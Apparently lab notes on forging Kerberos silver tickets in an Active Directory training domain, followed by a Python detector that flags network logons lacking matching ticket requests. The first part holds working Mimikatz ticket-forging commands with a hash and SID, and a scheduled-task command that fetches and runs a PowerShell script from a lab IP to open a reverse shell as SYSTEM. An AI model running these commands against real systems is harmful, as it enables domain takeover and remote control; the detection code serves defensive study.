Creates a Kerberos ticket for the administrator account and a service of your choosing. The example below uses Powercat and Invoke-PowerShellTcp to get a reverse shell:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User518" /TR "powershell.exe -c 'iex (iwr http://172.16.100.18:8181/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.18 -Port 443'"
To create a Silver Ticket for the WMI service, create Kerberos tickets for both the HOST and RPCSS services:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'
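Detection side of the tickets forged above, as an added example that is not part of the original notes: a forged service ticket is never requested from the KDC, so the target records a Kerberos network logon (Event ID 4624) with no matching service ticket request (Event ID 4769) on any domain controller. The code assumes both event sets are already exported as dicts keyed by the events' own field names plus `time` and `Computer`, and that the service runs under the computer account; the `student1` account and all sample events are constructed.

```python
from datetime import datetime, timedelta

TICKET_LIFETIME = timedelta(hours=10)  # AD default max service ticket lifetime (600 min)
CLOCK_SKEW = timedelta(minutes=5)      # Kerberos default tolerance between hosts

def _user(name):
    """'student1@DOLLARCORP.MONEYCORP.LOCAL' or 'student1' -> 'student1'."""
    return name.split("@")[0].lower()

def _host(name):
    """'DCORP-DC$' or 'dcorp-dc.dollarcorp.moneycorp.local' -> 'dcorp-dc'."""
    return name.rstrip("$").split(".")[0].lower()

def find_unbacked_logons(logons_4624, tgs_4769, lifetime=TICKET_LIFETIME):
    """Return Kerberos network logons that no KDC-issued service ticket explains."""
    issued = {}
    for ev in tgs_4769:  # index ticket requests by (user, service host)
        key = (_user(ev["TargetUserName"]), _host(ev["ServiceName"]))
        issued.setdefault(key, []).append(ev["time"])
    suspects = []
    for ev in logons_4624:
        if ev["LogonType"] != 3 or ev["AuthenticationPackageName"] != "Kerberos":
            continue  # only network logons authenticated with a service ticket
        key = (_user(ev["TargetUserName"]), _host(ev["Computer"]))
        # A cached ticket can be reused for its whole lifetime without a new 4769.
        backed = any(-CLOCK_SKEW <= ev["time"] - t <= lifetime
                     for t in issued.get(key, []))
        if not backed:
            suspects.append(ev)
    return suspects

# Constructed sample events (not real logs).
T0 = datetime(2024, 1, 1, 9, 0, 0)
DC = "dcorp-dc.dollarcorp.moneycorp.local"
SAMPLE_4769 = [{"time": T0, "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
                "ServiceName": "DCORP-DC$"}]
SAMPLE_4624 = [
    {"time": T0 + timedelta(minutes=2), "Computer": DC, "TargetUserName": "student1",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"time": T0 + timedelta(minutes=30), "Computer": DC, "TargetUserName": "Administrator",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
]

if __name__ == "__main__":
    for ev in find_unbacked_logons(SAMPLE_4624, SAMPLE_4769):
        print("no 4769 for", ev["TargetUserName"], "on", ev["Computer"], "at", ev["time"])
```

The correlation is only meaningful when 4769 events are collected from every domain controller; a gap in collection shows up as false positives.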